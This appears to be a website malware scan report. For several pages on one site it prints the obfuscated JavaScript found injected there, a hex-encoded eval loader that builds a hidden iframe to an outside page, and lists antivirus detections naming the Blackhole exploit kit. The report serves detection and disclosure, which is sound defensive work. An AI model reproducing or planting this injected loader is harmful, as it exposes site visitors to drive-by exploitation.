Malicious code - confirmed by antiviruses (see below) ppncf=\"fr\"+\"omCh\"+\"arCo\"+\"de\";if(document.querySelector)lenlr=4;lntq=(\"65,ab,ba,b3,a8,b9,ae,b4,b3,65,bc,ab,b1,b3,a8,75,7e,6d,6e,65,c0,52,4f,65,bb,a6,b7,65,b8,b9,a6,b9,ae,a8,82,6c,a6,af,a6,bd,6c,80,52,4f,65,bb,a6,b7,65,a8,b4,b3,b9,b7,b4,b1,b1,aa,b7,82,6c,ae,b3,a9,aa,bd,73,b5,ad,b5,6c,80,52,4f,65,bb,a6,b7,65,bc,ab,b1,b3,a8,65,82,65,a9,b4,a8,ba,b2,aa,b3,b9,73,a8,b7,aa,a6,b9,aa,8a,b1,aa,b2,aa,b3,b9,6d,6c,ae,ab,b7,a6,b2,aa,6c,6e,80,52,4f,52,4f,65,bc,ab,b1,b3,a8,73,b8,b7,a8,65,82,65,6c,ad,b9,
... 3651 bytes are skipped ...6c,6e,82,82,7a,7a,6e,c0,c2,aa,b1,b8,aa,c0,98,aa,b9,88,b4,b4,b0,ae,aa,6d,6c,bb,ae,b8,ae,b9,aa,a9,a4,ba,b6,6c,71,65,6c,7a,7a,6c,71,65,6c,76,6c,71,65,6c,74,6c,6e,80,52,4f,52,4f,bc,ab,b1,b3,a8,75,7e,6d,6e,80,52,4f,c2,52,4f,c2\".split(\",\"));lwm=eval;function klvwnq(){rwfg=function(){--(sab.body)}()}sab=document;for(emnbyc=0;emnbyc<lntq[\"length\"];emnbyc+=1){lntq[emnbyc]=-(69)+parseInt(lntq[emnbyc],lenlr*4);}try{klvwnq()}catch(rwkszc){idurj=50-50;}if(!idurj)lwm(String[ppncf].apply(String,lntq));Antivirus reports:- Ikarus
- Exploit.JS.Blackhole
|
http://www.rmsbus.com/upcoming-events.php | 200 OK Content-Length: 13379 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ppncf=\"fr\"+\"omCh\"+\"arCo\"+\"de\";if(document.querySelector)lenlr=4;lntq=(\"65,ab,ba,b3,a8,b9,ae,b4,b3,65,bc,ab,b1,b3,a8,75,7e,6d,6e,65,c0,52,4f,65,bb,a6,b7,65,b8,b9,a6,b9,ae,a8,82,6c,a6,af,a6,bd,6c,80,52,4f,65,bb,a6,b7,65,a8,b4,b3,b9,b7,b4,b1,b1,aa,b7,82,6c,ae,b3,a9,aa,bd,73,b5,ad,b5,6c,80,52,4f,65,bb,a6,b7,65,bc,ab,b1,b3,a8,65,82,65,a9,b4,a8,ba,b2,aa,b3,b9,73,a8,b7,aa,a6,b9,aa,8a,b1,aa,b2,aa,b3,b9,6d,6c,ae,ab,b7,a6,b2,aa,6c,6e,80,52,4f,52,4f,65,bc,ab,b1,b3,a8,73,b8,b7,a8,65,82,65,6c,ad,b9,
... 3651 bytes are skipped ...6c,6e,82,82,7a,7a,6e,c0,c2,aa,b1,b8,aa,c0,98,aa,b9,88,b4,b4,b0,ae,aa,6d,6c,bb,ae,b8,ae,b9,aa,a9,a4,ba,b6,6c,71,65,6c,7a,7a,6c,71,65,6c,76,6c,71,65,6c,74,6c,6e,80,52,4f,52,4f,bc,ab,b1,b3,a8,75,7e,6d,6e,80,52,4f,c2,52,4f,c2\".split(\",\"));lwm=eval;function klvwnq(){rwfg=function(){--(sab.body)}()}sab=document;for(emnbyc=0;emnbyc<lntq[\"length\"];emnbyc+=1){lntq[emnbyc]=-(69)+parseInt(lntq[emnbyc],lenlr*4);}try{klvwnq()}catch(rwkszc){idurj=50-50;}if(!idurj)lwm(String[ppncf].apply(String,lntq));Antivirus reports:- Ikarus
- Exploit.JS.Blackhole
|
http://www.rmsbus.com/esp/upcoming-events.php | 200 OK Content-Length: 15018 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ppncf=\"fr\"+\"omCh\"+\"arCo\"+\"de\";if(document.querySelector)lenlr=4;lntq=(\"65,ab,ba,b3,a8,b9,ae,b4,b3,65,bc,ab,b1,b3,a8,75,7e,6d,6e,65,c0,52,4f,65,bb,a6,b7,65,b8,b9,a6,b9,ae,a8,82,6c,a6,af,a6,bd,6c,80,52,4f,65,bb,a6,b7,65,a8,b4,b3,b9,b7,b4,b1,b1,aa,b7,82,6c,ae,b3,a9,aa,bd,73,b5,ad,b5,6c,80,52,4f,65,bb,a6,b7,65,bc,ab,b1,b3,a8,65,82,65,a9,b4,a8,ba,b2,aa,b3,b9,73,a8,b7,aa,a6,b9,aa,8a,b1,aa,b2,aa,b3,b9,6d,6c,ae,ab,b7,a6,b2,aa,6c,6e,80,52,4f,52,4f,65,bc,ab,b1,b3,a8,73,b8,b7,a8,65,82,65,6c,ad,b9,
... 3651 bytes are skipped ...6c,6e,82,82,7a,7a,6e,c0,c2,aa,b1,b8,aa,c0,98,aa,b9,88,b4,b4,b0,ae,aa,6d,6c,bb,ae,b8,ae,b9,aa,a9,a4,ba,b6,6c,71,65,6c,7a,7a,6c,71,65,6c,76,6c,71,65,6c,74,6c,6e,80,52,4f,52,4f,bc,ab,b1,b3,a8,75,7e,6d,6e,80,52,4f,c2,52,4f,c2\".split(\",\"));lwm=eval;function klvwnq(){rwfg=function(){--(sab.body)}()}sab=document;for(emnbyc=0;emnbyc<lntq[\"length\"];emnbyc+=1){lntq[emnbyc]=-(69)+parseInt(lntq[emnbyc],lenlr*4);}try{klvwnq()}catch(rwkszc){idurj=50-50;}if(!idurj)lwm(String[ppncf].apply(String,lntq));Antivirus reports:- Ikarus
- Exploit.JS.Blackhole
|
http://www.rmsbus.com/esp/js_preload.js | 404 Not Found Content-Length: 6692 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) tbg="fr"+"omCh"+"arCo"+"de";if(document.querySelector)gmqkfh=4;kralm=("5c,a2,b1,aa,9f,b0,a5,ab,aa,5c,a3,af,a1,b4,ab,6c,75,64,65,5c,b7,49,46,5c,b2,9d,ae,5c,af,b0,9d,b0,a5,9f,79,63,9d,a6,9d,b4,63,77,49,46,5c,b2,9d,ae,5c,9f,ab,aa,b0,ae,ab,a8,a8,a1,ae,79,63,a5,aa,a0,a1,b4,6a,ac,a4,ac,63,77,49,46,5c,b2,9d,ae,5c,a3,af,a1,b4,ab,5c,79,5c,a0,ab,9f,b1,a9,a1,aa,b0,6a,9f,ae,a1,9d,b0,a1,81,a8,a1,a9,a1,aa,b0,64,63,a5,a2,ae,9d,a9,a1,63,65,77,49,46,49,46,5c,a3,af,a1,b4,ab,6a,af,ae,9f,5c,79,5c,63,a4,b0,b0,ac,76,
... 3671 bytes are skipped ...,63,65,79,79,71,71,65,b7,b9,a1,a8,af,a1,b7,8f,a1,b0,7f,ab,ab,a7,a5,a1,64,63,b2,a5,af,a5,b0,a1,a0,9b,b1,ad,63,68,5c,63,71,71,63,68,5c,63,6d,63,68,5c,63,6b,63,65,77,49,46,49,46,a3,af,a1,b4,ab,6c,75,64,65,77,49,46,b9,49,46,b9".split(","));vhvqo=eval;function ciggb(){btrxxd=function(){--(xde.body)}()}xde=document;for(tuwikz=0;tuwikz<kralm["length"];tuwikz+=1){kralm[tuwikz]=-(60)+parseInt(kralm[tuwikz],gmqkfh*4);}try{ciggb()}catch(ckmzk){ohlv=50-50;}if(!ohlv)vhvqo(String[tbg].apply(String,kralm));Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- Comodo
- TrojWare.JS.Kryptik.AOH
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NC
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|